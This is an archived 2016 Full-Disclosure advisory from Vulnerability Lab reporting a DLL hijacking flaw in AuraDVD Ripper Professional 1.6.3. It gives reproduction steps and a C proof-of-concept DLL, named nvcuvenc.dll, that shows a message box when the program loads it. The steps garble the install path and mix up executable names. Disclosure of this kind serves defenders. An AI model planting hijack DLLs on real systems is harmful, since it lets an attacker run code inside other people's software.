lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 4 Oct 2016 14:13:36 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] AuraDVD Ripper Professional v1.6.3 - DLL Hijacking Exploit

Document Title:
===============
AuraDVD Ripper Professional v1.6.3 - DLL Hijacking Exploit


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1966


Release Date:
=============
2016-10-04


Vulnerability Laboratory ID (VL-ID):
====================================
1966


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
Aura DVD Ripper is the best application for ripping DVD and converting between video formats. It can brilliantly make videos for iPad, 
iPod, Zune and all kinds of media players and mobile phones from DVDs and videos of a wide range of formats. It supports convert videos 
or rip DVD movies for protable mobile phones. It even burns videos to standard DVD and Blu-ray disc. With the DVD ripping software, 
ripping DVD movies to AVI, MP4, WMV, FLV or even Flash (SWF) is now an easy job that can be done instantly. The Aura DVD Ripper also 
functions as a total video converter and YouTube video downloader.
 
(Copy of the Vendor Homepage: http://www.aura4you.com/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a dll hijacking exploit in the official AuraDVD Ripper Professional 1.6.3 software.


Vulnerability Disclosure Timeline:
==================================
2016-10-04:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Aura4You
Product: Aura Video Converter - Software 1.6.3


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local dll injection vulnerability has been discovered in the official AuraDVD Ripper Professional 1.6.3 software.
The issue allows local attackers to inject code to vulnerable dynamic link libraries to compromise the process 
or to gain higher system access privileges. Thus allows a local attacker to compromise the system process of the
affected software to followup with manipulations. 

Vulnerable Software:
[+] AuraDVD Ripper Professional

Vulnerable Version(s):
[+] v1.6.3

Vulnerable Libraries:
[+] nvcuvenc.dll


Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the local vulnerability ...
1. Compile the dll (dynamic link library)
2. Rename to nvcuvenc.dll
3. Copy nvcuvenc.dll to C:Program FilesAura4YouAura DVD Ripper ProfessionalAuraDVDConvPro.exe
4. Launch AuraVideoConv.exe
5. MessageBox Executed


-- PoC Exploit --
#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "DLL Hijacking ZwX!", "DLL Message", MB_OK);
return 0;
}


Security Risk:
==============
The security risk of the dynamic link library issue in the software is estimated as medium. (CVSS 4.3)


Credits & Authors:
==================
ZwX - ( http://zwx.fr ) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists